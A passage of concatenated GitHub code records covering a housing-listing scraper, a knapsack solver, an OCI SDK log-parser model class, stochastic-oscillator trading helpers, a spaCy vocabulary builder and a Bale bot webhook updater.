  • ',re.S)\r\n result_fin=pattern.findall(str(result))\r\n print(result_fin[0])\r\n \r\n '''\r\n\r\n\r\n def build_request(self,parse_url):\r\n header = {\r\n\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\r\n\r\n }\r\n request = urllib.request.Request(url=parse_url, headers=header)\r\n content = urllib.request.urlopen(request).read().decode()\r\n # with open('pg_%s.html'% page,'wb') as fp :\r\n # fp.write(content)\r\n return content\r\n\r\n\r\n def parse_content(self,content):\r\n soup = BeautifulSoup(content, 'lxml')\r\n #print(type(soup))\r\n #a_content = soup.find_all('a',class_=\"title\")\r\n #for k in a_content:\r\n #print(k.string)\r\n a_herf = soup.find_all('a',class_=\"title\")\r\n for k in a_herf:\r\n #print(type(k['href']))\r\n content = self.build_request(k['href'])\r\n parse_content = self.parse_content_detail(content)\r\n\r\n time.sleep(1)\r\n\r\n\r\n\r\n def run(self):\r\n\r\n for page in range(self.start_page,self.end_page+1):\r\n print(\"-------------crawling the %s page-----------\"% page)\r\n parse_url = self.url + str(page) +'/'\r\n # print(parse_url)\r\n content = self.build_request(parse_url)\r\n #print(content)\r\n parse_content = self.parse_content(content)\r\n time.sleep(5)\r\n\r\ndef main():\r\n\r\n\r\n start_page = int(input(\"input the start page : \"))\r\n end_page = int(input(\"input the end page : \"))\r\n spider = second_hand_house(start_page,end_page)\r\n spider.run()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Crystal-Dragon-Liu/ML_practise","sub_path":"job_of_python/ershoufang/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":15538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13115303422","text":"from sys import stdin\nn, k = map(int, stdin.readline().split())\n\narr = [[0] * (k + 1) for _ in range(n + 1)]\nfor i in range(1, n + 1):\n w, v = map(int, input().split())\n for j in range(k + 1):\n if j < w:\n arr[i][j] = arr[i - 1][j]\n else:\n arr[i][j] = max(arr[i - 1][j], arr[i - 1][j - w] + v)\n\nprint(arr[n][k])\n","repo_name":"olive-su/1day_1Algorithm","sub_path":"22.03_PS/0321_평범한_배낭.py","file_name":"0321_평범한_배낭.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31596604009","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass UnifiedAgentParser(object):\n \"\"\"\n Source parser object.\n \"\"\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"AUDITD\"\n PARSER_TYPE_AUDITD = \"AUDITD\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"CRI\"\n PARSER_TYPE_CRI = \"CRI\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"JSON\"\n PARSER_TYPE_JSON = \"JSON\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"TSV\"\n PARSER_TYPE_TSV = \"TSV\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"CSV\"\n PARSER_TYPE_CSV = \"CSV\"\n\n #: A 
constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"NONE\"\n PARSER_TYPE_NONE = \"NONE\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"SYSLOG\"\n PARSER_TYPE_SYSLOG = \"SYSLOG\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"APACHE2\"\n PARSER_TYPE_APACHE2 = \"APACHE2\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"APACHE_ERROR\"\n PARSER_TYPE_APACHE_ERROR = \"APACHE_ERROR\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"MSGPACK\"\n PARSER_TYPE_MSGPACK = \"MSGPACK\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"REGEXP\"\n PARSER_TYPE_REGEXP = \"REGEXP\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"MULTILINE\"\n PARSER_TYPE_MULTILINE = \"MULTILINE\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"GROK\"\n PARSER_TYPE_GROK = \"GROK\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"MULTILINE_GROK\"\n PARSER_TYPE_MULTILINE_GROK = \"MULTILINE_GROK\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new UnifiedAgentParser object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.logging.models.UnifiedAgentMultilineGrokParser`\n * :class:`~oci.logging.models.UnifiedJSONParser`\n * :class:`~oci.logging.models.UnifiedAgentGrokParser`\n * :class:`~oci.logging.models.UnifiedAgentNoneParser`\n * :class:`~oci.logging.models.UnifiedAgentSyslogParser`\n * :class:`~oci.logging.models.UnifiedAgentAuditdParser`\n * :class:`~oci.logging.models.UnifiedAgentApache2Parser`\n * :class:`~oci.logging.models.UnifiedAgentRegexParser`\n * :class:`~oci.logging.models.UnifiedAgentMultilineParser`\n * :class:`~oci.logging.models.UnifiedAgentTsvParser`\n * :class:`~oci.logging.models.UnifiedAgentCriParser`\n * :class:`~oci.logging.models.UnifiedAgentApacheErrorParser`\n * :class:`~oci.logging.models.UnifiedAgentMsgpackParser`\n * :class:`~oci.logging.models.UnifiedAgentCsvParser`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param parser_type:\n The value to assign to the parser_type property of this UnifiedAgentParser.\n Allowed values for this property are: \"AUDITD\", \"CRI\", \"JSON\", \"TSV\", \"CSV\", \"NONE\", \"SYSLOG\", \"APACHE2\", \"APACHE_ERROR\", \"MSGPACK\", \"REGEXP\", \"MULTILINE\", \"GROK\", \"MULTILINE_GROK\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type parser_type: str\n\n :param field_time_key:\n The value to assign to the field_time_key property of this UnifiedAgentParser.\n :type field_time_key: str\n\n :param types:\n The value to assign to the types property of this UnifiedAgentParser.\n :type types: dict(str, str)\n\n :param null_value_pattern:\n The value to assign to the 
null_value_pattern property of this UnifiedAgentParser.\n :type null_value_pattern: str\n\n :param is_null_empty_string:\n The value to assign to the is_null_empty_string property of this UnifiedAgentParser.\n :type is_null_empty_string: bool\n\n :param is_estimate_current_event:\n The value to assign to the is_estimate_current_event property of this UnifiedAgentParser.\n :type is_estimate_current_event: bool\n\n :param is_keep_time_key:\n The value to assign to the is_keep_time_key property of this UnifiedAgentParser.\n :type is_keep_time_key: bool\n\n :param timeout_in_milliseconds:\n The value to assign to the timeout_in_milliseconds property of this UnifiedAgentParser.\n :type timeout_in_milliseconds: int\n\n \"\"\"\n self.swagger_types = {\n 'parser_type': 'str',\n 'field_time_key': 'str',\n 'types': 'dict(str, str)',\n 'null_value_pattern': 'str',\n 'is_null_empty_string': 'bool',\n 'is_estimate_current_event': 'bool',\n 'is_keep_time_key': 'bool',\n 'timeout_in_milliseconds': 'int'\n }\n\n self.attribute_map = {\n 'parser_type': 'parserType',\n 'field_time_key': 'fieldTimeKey',\n 'types': 'types',\n 'null_value_pattern': 'nullValuePattern',\n 'is_null_empty_string': 'isNullEmptyString',\n 'is_estimate_current_event': 'isEstimateCurrentEvent',\n 'is_keep_time_key': 'isKeepTimeKey',\n 'timeout_in_milliseconds': 'timeoutInMilliseconds'\n }\n\n self._parser_type = None\n self._field_time_key = None\n self._types = None\n self._null_value_pattern = None\n self._is_null_empty_string = None\n self._is_estimate_current_event = None\n self._is_keep_time_key = None\n self._timeout_in_milliseconds = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['parserType']\n\n if type == 'MULTILINE_GROK':\n return 'UnifiedAgentMultilineGrokParser'\n\n if type == 'JSON':\n return 'UnifiedJSONParser'\n\n if type == 'GROK':\n return 'UnifiedAgentGrokParser'\n\n if type == 'NONE':\n return 'UnifiedAgentNoneParser'\n\n if type == 'SYSLOG':\n return 'UnifiedAgentSyslogParser'\n\n if type == 'AUDITD':\n return 'UnifiedAgentAuditdParser'\n\n if type == 'APACHE2':\n return 'UnifiedAgentApache2Parser'\n\n if type == 'REGEXP':\n return 'UnifiedAgentRegexParser'\n\n if type == 'MULTILINE':\n return 'UnifiedAgentMultilineParser'\n\n if type == 'TSV':\n return 'UnifiedAgentTsvParser'\n\n if type == 'CRI':\n return 'UnifiedAgentCriParser'\n\n if type == 'APACHE_ERROR':\n return 'UnifiedAgentApacheErrorParser'\n\n if type == 'MSGPACK':\n return 'UnifiedAgentMsgpackParser'\n\n if type == 'CSV':\n return 'UnifiedAgentCsvParser'\n else:\n return 'UnifiedAgentParser'\n\n @property\n def parser_type(self):\n \"\"\"\n **[Required]** Gets the parser_type of this UnifiedAgentParser.\n Type of fluent parser.\n\n Allowed values for this property are: \"AUDITD\", \"CRI\", \"JSON\", \"TSV\", \"CSV\", \"NONE\", \"SYSLOG\", \"APACHE2\", \"APACHE_ERROR\", \"MSGPACK\", \"REGEXP\", \"MULTILINE\", \"GROK\", \"MULTILINE_GROK\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The parser_type of this UnifiedAgentParser.\n :rtype: str\n \"\"\"\n return self._parser_type\n\n @parser_type.setter\n def parser_type(self, parser_type):\n \"\"\"\n Sets the parser_type of this UnifiedAgentParser.\n Type of fluent parser.\n\n\n :param parser_type: The parser_type of this UnifiedAgentParser.\n 
:type: str\n \"\"\"\n allowed_values = [\"AUDITD\", \"CRI\", \"JSON\", \"TSV\", \"CSV\", \"NONE\", \"SYSLOG\", \"APACHE2\", \"APACHE_ERROR\", \"MSGPACK\", \"REGEXP\", \"MULTILINE\", \"GROK\", \"MULTILINE_GROK\"]\n if not value_allowed_none_or_none_sentinel(parser_type, allowed_values):\n parser_type = 'UNKNOWN_ENUM_VALUE'\n self._parser_type = parser_type\n\n @property\n def field_time_key(self):\n \"\"\"\n Gets the field_time_key of this UnifiedAgentParser.\n Specifies the time field for the event time. If the event doesn't have this field, the current time is used.\n\n\n :return: The field_time_key of this UnifiedAgentParser.\n :rtype: str\n \"\"\"\n return self._field_time_key\n\n @field_time_key.setter\n def field_time_key(self, field_time_key):\n \"\"\"\n Sets the field_time_key of this UnifiedAgentParser.\n Specifies the time field for the event time. If the event doesn't have this field, the current time is used.\n\n\n :param field_time_key: The field_time_key of this UnifiedAgentParser.\n :type: str\n \"\"\"\n self._field_time_key = field_time_key\n\n @property\n def types(self):\n \"\"\"\n Gets the types of this UnifiedAgentParser.\n Specify types for converting a field into another type.\n For example,\n With this configuration:\n \n @type csv\n keys time,host,req_id,user\n time_key time\n \n\n This incoming event:\n \\\"2013/02/28 12:00:00,192.168.0.1,111,-\\\"\n\n is parsed as:\n 1362020400 (2013/02/28/ 12:00:00)\n\n record:\n {\n \\\"host\\\" : \\\"192.168.0.1\\\",\n \\\"req_id\\\" : \\\"111\\\",\n \\\"user\\\" : \\\"-\\\"\n }\n\n\n :return: The types of this UnifiedAgentParser.\n :rtype: dict(str, str)\n \"\"\"\n return self._types\n\n @types.setter\n def types(self, types):\n \"\"\"\n Sets the types of this UnifiedAgentParser.\n Specify types for converting a field into another type.\n For example,\n With this configuration:\n \n @type csv\n keys time,host,req_id,user\n time_key time\n \n\n This incoming event:\n \\\"2013/02/28 12:00:00,192.168.0.1,111,-\\\"\n\n is parsed as:\n 1362020400 (2013/02/28/ 12:00:00)\n\n record:\n {\n \\\"host\\\" : \\\"192.168.0.1\\\",\n \\\"req_id\\\" : \\\"111\\\",\n \\\"user\\\" : \\\"-\\\"\n }\n\n\n :param types: The types of this UnifiedAgentParser.\n :type: dict(str, str)\n \"\"\"\n self._types = types\n\n @property\n def null_value_pattern(self):\n \"\"\"\n Gets the null_value_pattern of this UnifiedAgentParser.\n Specify the null value pattern.\n\n\n :return: The null_value_pattern of this UnifiedAgentParser.\n :rtype: str\n \"\"\"\n return self._null_value_pattern\n\n @null_value_pattern.setter\n def null_value_pattern(self, null_value_pattern):\n \"\"\"\n Sets the null_value_pattern of this UnifiedAgentParser.\n Specify the null value pattern.\n\n\n :param null_value_pattern: The null_value_pattern of this UnifiedAgentParser.\n :type: str\n \"\"\"\n self._null_value_pattern = null_value_pattern\n\n @property\n def is_null_empty_string(self):\n \"\"\"\n Gets the is_null_empty_string of this UnifiedAgentParser.\n If true, an empty string field is replaced with a null value.\n\n\n :return: The is_null_empty_string of this UnifiedAgentParser.\n :rtype: bool\n \"\"\"\n return self._is_null_empty_string\n\n @is_null_empty_string.setter\n def is_null_empty_string(self, is_null_empty_string):\n \"\"\"\n Sets the is_null_empty_string of this UnifiedAgentParser.\n If true, an empty string field is replaced with a null value.\n\n\n :param is_null_empty_string: The is_null_empty_string of this UnifiedAgentParser.\n :type: bool\n \"\"\"\n 
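 # --- editor's note (hypothetical usage sketch, not part of the generated SDK
 # code): get_subtype() above is how a deserializer picks the concrete parser
 # class from the wire form, e.g.
 #
 #   payload = {'parserType': 'CSV', 'fieldTimeKey': 'time', 'isKeepTimeKey': True}
 #   UnifiedAgentParser.get_subtype(payload)   # -> 'UnifiedAgentCsvParser'
 #
 # The camelCase keys are then mapped onto the snake_case properties defined
 # below via attribute_map when that subclass is instantiated.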
self._is_null_empty_string = is_null_empty_string\n\n @property\n def is_estimate_current_event(self):\n \"\"\"\n Gets the is_estimate_current_event of this UnifiedAgentParser.\n If true, use Fluent::EventTime.now(current time) as a timestamp when the time_key is specified.\n\n\n :return: The is_estimate_current_event of this UnifiedAgentParser.\n :rtype: bool\n \"\"\"\n return self._is_estimate_current_event\n\n @is_estimate_current_event.setter\n def is_estimate_current_event(self, is_estimate_current_event):\n \"\"\"\n Sets the is_estimate_current_event of this UnifiedAgentParser.\n If true, use Fluent::EventTime.now(current time) as a timestamp when the time_key is specified.\n\n\n :param is_estimate_current_event: The is_estimate_current_event of this UnifiedAgentParser.\n :type: bool\n \"\"\"\n self._is_estimate_current_event = is_estimate_current_event\n\n @property\n def is_keep_time_key(self):\n \"\"\"\n Gets the is_keep_time_key of this UnifiedAgentParser.\n If true, keep the time field in the record.\n\n\n :return: The is_keep_time_key of this UnifiedAgentParser.\n :rtype: bool\n \"\"\"\n return self._is_keep_time_key\n\n @is_keep_time_key.setter\n def is_keep_time_key(self, is_keep_time_key):\n \"\"\"\n Sets the is_keep_time_key of this UnifiedAgentParser.\n If true, keep the time field in the record.\n\n\n :param is_keep_time_key: The is_keep_time_key of this UnifiedAgentParser.\n :type: bool\n \"\"\"\n self._is_keep_time_key = is_keep_time_key\n\n @property\n def timeout_in_milliseconds(self):\n \"\"\"\n Gets the timeout_in_milliseconds of this UnifiedAgentParser.\n Specify the timeout for parse processing. This is mainly for detecting an incorrect regexp pattern.\n\n\n :return: The timeout_in_milliseconds of this UnifiedAgentParser.\n :rtype: int\n \"\"\"\n return self._timeout_in_milliseconds\n\n @timeout_in_milliseconds.setter\n def timeout_in_milliseconds(self, timeout_in_milliseconds):\n \"\"\"\n Sets the timeout_in_milliseconds of this UnifiedAgentParser.\n Specify the timeout for parse processing. 
This is mainly for detecting an incorrect regexp pattern.\n\n\n :param timeout_in_milliseconds: The timeout_in_milliseconds of this UnifiedAgentParser.\n :type: int\n \"\"\"\n self._timeout_in_milliseconds = timeout_in_milliseconds\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/logging/models/unified_agent_parser.py","file_name":"unified_agent_parser.py","file_ext":"py","file_size_in_byte":15943,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"43532045326","text":"import numpy as np\nimport pandas as pd\nimport algorithms.obv\n\n\ndef stc_slow_plot(goog_data, N=14, M=5, T=5) :\n L = goog_data[\"low_price\"].rolling(window=N).min()\n H = goog_data[\"high_price\"].rolling(window=N).max()\n\n fast_k = ((goog_data[\"trade_price\"] - L) / (H - L)) * 100\n slow_k = fast_k.ewm(span=M).mean()\n slow_d = slow_k.ewm(span=T).mean()\n\n goog_data['signal'] = pd.Series(np.zeros(len(goog_data)))\n goog_data['position'] = pd.Series(np.zeros(len(goog_data)))\n\n goog_data = algorithms.obv_with_ema(goog_data)\n\n \n\n for i in range(1,len(goog_data)):\n if slow_d.iloc[i] < 30 and slow_k.iloc[i] > slow_d.iloc[i] : \n goog_data['signal'].iloc[i] = 1\n \n elif slow_k.iloc[i] > 50 and slow_k.iloc[i] < slow_d.iloc[i] : \n goog_data['signal'].iloc[i] = 0\n\n # goog_data['signal'][0:] =\\\n # np.where((slow_d[0:] < 30 and slow_k[0:] > slow_d[0:]), 1.0, 0.0)\n goog_data['orders'] = goog_data['signal'].diff()\n\n import matplotlib.pyplot as plt\n\n fig = plt.figure()\n ax1 = fig.add_subplot(211, ylabel='Google price in $')\n goog_data[\"trade_price\"].plot(ax=ax1, color='g', lw=.5)\n ax1.plot(goog_data.loc[goog_data.orders== 1.0].index,\n goog_data[\"trade_price\"][goog_data.orders == 1.0],\n '^', markersize=7, color='k')\n\n ax1.plot(goog_data.loc[goog_data.orders== -1.0].index,\n goog_data[\"trade_price\"][goog_data.orders == -1.0],\n 'v', markersize=7, color='k')\n\n\n # ax2 = fig.add_subplot(312, ylabel='MACD')\n # slow_k.plot(ax=ax2, color='black', lw=2., legend=True)\n # slow_d.plot(ax=ax2, color='g', lw=2., legend=True)\n\n # plt.legend([\"Price\",\"Short mavg\",\"Long mavg\",\"Buy\",\"Sell\"])\n plt.title(\"stc\")\n\n plt.show()\n\ndef stc_slow(data, N=9, M=3, T=3) :\n L = data[\"low_price\"].rolling(window=N).min()\n H = data[\"high_price\"].rolling(window=N).max()\n\n fast_k = ((data[\"trade_price\"] - L) / (H - L)) * 100\n slow_k = fast_k.ewm(span=M).mean()\n slow_d = slow_k.ewm(span=T).mean()\n return slow_k, slow_d\n\n\n\ndef is_stc_slow_good(data, N=9, M=3, T=3) :\n L = data[\"low_price\"].rolling(window=N).min()\n H = data[\"high_price\"].rolling(window=N).max()\n\n fast_k = ((data[\"trade_price\"] - L) / (H - L)) * 100\n slow_k = fast_k.ewm(span=M).mean()\n slow_d = slow_k.ewm(span=T).mean()\n\n if slow_k.iloc[-1] > slow_d.iloc[-1]:\n return slow_d.iloc[-1]\n return 100\n\ndef is_stc_slow_bad(data, N=9, M=3, T=3) :\n L = data[\"low_price\"].rolling(window=N).min()\n H = data[\"high_price\"].rolling(window=N).max()\n\n fast_k = ((data[\"trade_price\"] - L) / (H - L)) * 100\n slow_k = fast_k.ewm(span=M).mean()\n slow_d = slow_k.ewm(span=T).mean()\n\n return slow_k.iloc[-1] < 
slow_d.iloc[-1]\n","repo_name":"sanghun1210/upbit_auto_trader","sub_path":"algorithms/stochastic_slow.py","file_name":"stochastic_slow.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1394166335","text":"import os\r\nimport pandas as pd\r\nimport spacy \r\nimport torch\r\nimport pickle\r\nspacy_eng = spacy.load('en_core_web_sm')\r\nclass Vocab_Builder:\r\n def __init__ (self,freq_threshold):\r\n self.itos = {0 : \"\", 1 : \"\", 2 : \"\", 3 : \"\"} \r\n self.stoi = {\"\" : 0, \"\" : 1, \"\" : 2, \"\" : 3} \r\n self.freq_threshold = freq_threshold\r\n def __len__(self):\r\n return len(self.itos)\r\n @staticmethod\r\n def tokenizer_eng(text):\r\n return [token.text.lower() for token in spacy_eng.tokenizer(text)]\r\n def build_vocabulary(self, sentence_list):\r\n frequencies = {} \r\n idx = 4 \r\n for sentence in sentence_list:\r\n for word in self.tokenizer_eng(sentence):\r\n if word not in frequencies:\r\n frequencies[word] = 1\r\n else:\r\n frequencies[word] += 1 \r\n if(frequencies[word] == self.freq_threshold):\r\n self.stoi[word] = idx\r\n self.itos[idx] = word\r\n idx += 1\r\n def numericalize(self,text):\r\n tokenized_text = self.tokenizer_eng(text)\r\n return [self.stoi[token] if token in self.stoi else self.stoi[\"\"]\r\n for token in tokenized_text ] \r\n def denumericalize(self, tensors):\r\n text = [self.itos[token] if token in self.itos else self.itos[3]]\r\n return text\r\n","repo_name":"VedasreeRaja/ImageCaptionGenerator","sub_path":"vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43611104336","text":"import traceback\nfrom queue import Queue\nfrom threading import Event, Lock, Thread, current_thread\nfrom time import sleep\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom python_bale_bot.dispatcher import Dispatcher\nfrom python_bale_bot.error import *\nfrom python_bale_bot.utils.logger import Logger\nfrom python_bale_bot.config import Config\nfrom python_bale_bot.bot import Bot\nfrom python_bale_bot.utils.webhookhandler import WebhookServer, WebhookHandler\n\n\nclass Updater:\n _session = None\n\n def __init__(self, token, user_id, base_url=None, workers=Config.default_worker_numbers, bot=None,\n adapter_kwargs=None):\n\n self.logger = Logger.get_logger()\n\n if not token:\n raise ValueError(\"`token` did't passed\")\n\n if (token is None) and (bot is None):\n raise ValueError('`token` or `bot` must be passed')\n\n if not user_id:\n raise ValueError(\"`user_id` did't passed\")\n\n con_pool_size = workers + 4\n if bot is not None:\n # T ODO bot.adapter.pool_connections * bot.adapter.pool_maxsize or bot.adapter.pool_maxsize\n max_available_conn = bot.adapter.pool_maxsize\n self.bot = bot\n if con_pool_size > max_available_conn:\n self.logger.warning(\n 'Connection pool of Adapter object is smaller than optimal value (%s)',\n con_pool_size)\n else:\n # we need a connection pool the size of:\n # * for each of the workers\n # * 1 for Dispatcher\n # * 1 for polling Updater (even if webhook is used, we can spare a connection)\n # * 1 for JobQueue\n # * 1 for main thread\n if adapter_kwargs is None:\n adapter_kwargs = {}\n\n if 'pool_connections' not in adapter_kwargs:\n adapter_kwargs['pool_connections'] = Config.default_adapter_pool_connections\n if 'pool_maxsize' not in adapter_kwargs:\n adapter_kwargs['pool_maxsize'] = 
Config.default_pool_maxsize\n self.adapter = HTTPAdapter(**adapter_kwargs)\n self.session = requests.Session()\n self.bot = Bot(token, user_id, base_url, adapter=self.adapter, session=self.session)\n self.incoming_queue = Queue()\n self.__exception_event = Event()\n self.dispatcher = Dispatcher(\n self.bot,\n self.incoming_queue,\n workers=workers,\n exception_event=self.__exception_event)\n\n self.token = token\n self.timeout = Config.request_timeout\n self.last_update_id = 0\n self.running = False\n self.is_idle = False\n self.httpd = None\n self.__lock = Lock()\n self.__threads = []\n\n # self.bale_futures = []\n\n def _init_thread(self, target, name, *args, **kwargs):\n thr = Thread(target=self._thread_wrapper, name=name, args=(target,) + args, kwargs=kwargs)\n thr.start()\n self.__threads.append(thr)\n\n def _thread_wrapper(self, target, *args, **kwargs):\n thr_name = current_thread().name\n self.logger.debug('thread {0} started'.format(thr_name))\n try:\n target(*args, **kwargs)\n except Exception as ex:\n self.logger.error(ex, extra={\"tag\": \"err\"})\n self.__exception_event.set()\n self.logger.exception('unhandled exception in thread %s', thr_name)\n traceback.print_exc()\n raise\n self.logger.debug('thread {0} - ended'.format(thr_name))\n\n # TODO should implement polling behavior of updater after server api is ready\n # def start_polling(self,\n # poll_interval=0.0,\n # timeout=10,\n # clean=False,\n # bootstrap_retries=-1,\n # read_latency=2.,\n # allowed_updates=None):\n # with self.__lock:\n # if not self.running:\n # self.running = True\n #\n # # Create & start threads\n # # self.job_queue.start()#--------------------\n # dispatcher_ready = Event()\n # # self._init_thread(self.dispatcher.start, \"dispatcher\", ready=dispatcher_ready)\n # self._init_thread(self._start_polling, \"updater\", poll_interval, timeout,\n # read_latency, bootstrap_retries, clean, allowed_updates)\n #\n # dispatcher_ready.wait()\n #\n # # Return the update queue so the main thread can insert updates\n # return self.incoming_queue\n\n # def _start_polling(self, poll_interval, timeout, read_latency, bootstrap_retries, clean,\n # allowed_updates): # pragma: no cover\n # # Thread target of thread 'updater'. 
Runs in background, pulls\n # # updates from Telegram and inserts them in the update queue of the\n # # Dispatcher.\n #\n # self.logger.debug('Updater thread started (polling)')\n #\n # self._bootstrap(bootstrap_retries, clean=clean, webhook_url='', allowed_updates=None) # ???\n #\n # self.logger.debug('Bootstrap done')\n #\n # def polling_action_cb():\n # updates = self.bot.get_difference(\n # self.last_update_id, timeout=timeout, read_latency=read_latency,\n # allowed_updates=allowed_updates)\n #\n # if updates:\n # if not self.running:\n # self.logger.debug('Updates ignored and will be pulled again on restart')\n # else:\n # for update in updates:\n # self.incoming_queue.put(update)\n # self.last_update_id = updates[-1].update_id + 1\n #\n # return True\n #\n # def polling_onerr_cb(exc):\n # # Put the error into the update queue and let the Dispatcher\n # # broadcast it\n # self.incoming_queue.put(exc)\n #\n # self._network_loop_retry(polling_action_cb, polling_onerr_cb, 'getting Updates',\n # poll_interval)\n def start_webhook(self,\n listen=Config.webhook_listen_address,\n port=Config.webhook_listen_port,\n url_path='',\n cert=None,\n key=None,\n clean=False,\n bootstrap_retries=0,\n webhook_url=None):\n with self.__lock:\n if not self.running:\n self.running = True\n\n # Create & start threads\n # self.job_queue.start()\n self._init_thread(self.dispatcher.start, \"dispatcher\"),\n self._init_thread(self._start_webhook, \"updater\", listen, port, url_path, cert,\n key, bootstrap_retries, clean, webhook_url)\n\n # Return the update queue so the main thread can insert updates\n return self.incoming_queue\n\n def _start_webhook(self, listen, port, url_path, cert, key, bootstrap_retries, clean, webhook_url):\n self.logger.debug('Updater thread started (webhook)')\n # use_ssl = cert is not None and key is not None\n if not url_path.startswith('/'):\n url_path = '/{0}'.format(url_path)\n\n # Create and start server\n self.httpd = WebhookServer((listen, port), WebhookHandler, self.incoming_queue, url_path, self.bot)\n\n # if use_ssl:\n # self._check_ssl_cert(cert, key)\n #\n # # DO NOT CHANGE: Only set webhook if SSL is handled by library\n if not webhook_url:\n webhook_url = self._gen_webhook_url(listen, port, url_path)\n # self._bootstrap(max_retries=bootstrap_retries, clean=clean, webhook_url=webhook_url)\n # elif clean:\n # self.logger.warning(\"cleaning updates is not supported if \"\n # \"SSL-termination happens elsewhere; skipping\")\n\n self.httpd.serve_forever(poll_interval=1)\n\n # def _check_ssl_cert(self, cert, key):\n # # Check SSL-Certificate with openssl, if possible\n # try:\n # exit_code = subprocess.call(\n # [\"openssl\", \"x509\", \"-text\", \"-noout\", \"-in\", cert],\n # stdout=open(os.devnull, 'wb'),\n # stderr=subprocess.STDOUT)\n # except OSError:\n # exit_code = 0\n # if exit_code is 0:\n # try:\n # self.httpd.socket = ssl.wrap_socket(\n # self.httpd.socket, certfile=cert, keyfile=key, server_side=True)\n # except ssl.SSLError as error:\n # self.logger.exception('Failed to init SSL socket')\n # raise TelegramError(str(error))\n # else:\n # raise TelegramError('SSL Certificate invalid')\n def _network_loop_retry(self, action_cb, onerr_cb, description, interval):\n self.logger.debug('Start network loop retry %s', description)\n cur_interval = interval\n while self.running:\n try:\n if not action_cb():\n break\n except Exception as e:\n print(e)\n except RetryAfter as e:\n self.logger.info('%s', e)\n cur_interval = 0.5 + e.retry_after\n except TimedOut as toe:\n 
self.logger.debug('Timed out %s: %s', description, toe)\n # If failure is due to timeout, we should retry asap.\n cur_interval = 0\n except InvalidToken as pex:\n self.logger.error('Invalid token; aborting')\n raise pex\n except BaleError as te:\n self.logger.error('Error while %s: %s', description, te)\n onerr_cb(te)\n cur_interval = self._increase_poll_interval(cur_interval)\n else:\n cur_interval = interval\n\n if cur_interval:\n sleep(cur_interval)\n\n @staticmethod\n def _gen_secure_webhook_url(listen, port, url_path):\n return 'https://{listen}:{port}{path}'.format(listen=listen, port=port, path=url_path)\n\n @staticmethod\n def _gen_webhook_url(listen, port, url_path):\n return 'http://{listen}:{port}{path}'.format(listen=listen, port=port, path=url_path)\n\n # TODO bootstrap issues must be fixed\n def _bootstrap(self, max_retries, clean, webhook_url, cert=None, bootstrap_interval=5):\n retries = [0]\n\n def bootstrap_del_webhook():\n self.bot.delete_webhook()\n return False\n\n def bootstrap_clean_updates():\n self.logger.debug('Cleaning updates from Bale server')\n updates = self.bot.get_difference()\n while updates:\n updates = self.bot.get_difference(updates[-1].update_id + 1)\n return False\n\n def bootstrap_set_webhook():\n self.bot.set_webhook(end_point=webhook_url)\n return False\n\n def bootstrap_onerr_cb(exc):\n if not isinstance(exc, Unauthorized) and (max_retries < 0 or retries[0] < max_retries):\n retries[0] += 1\n self.logger.warning('Failed bootstrap phase; try=%s max_retries=%s',\n retries[0], max_retries)\n else:\n self.logger.error('Failed bootstrap phase after %s retries (%s)', retries[0], exc)\n raise exc\n\n # Cleaning pending messages is done by polling for them - so we need to delete webhook if\n # one is configured.\n # We also take this chance to delete pre-configured webhook if this is a polling Updater.\n # NOTE: We don't know ahead if a webhook is configured, so we just 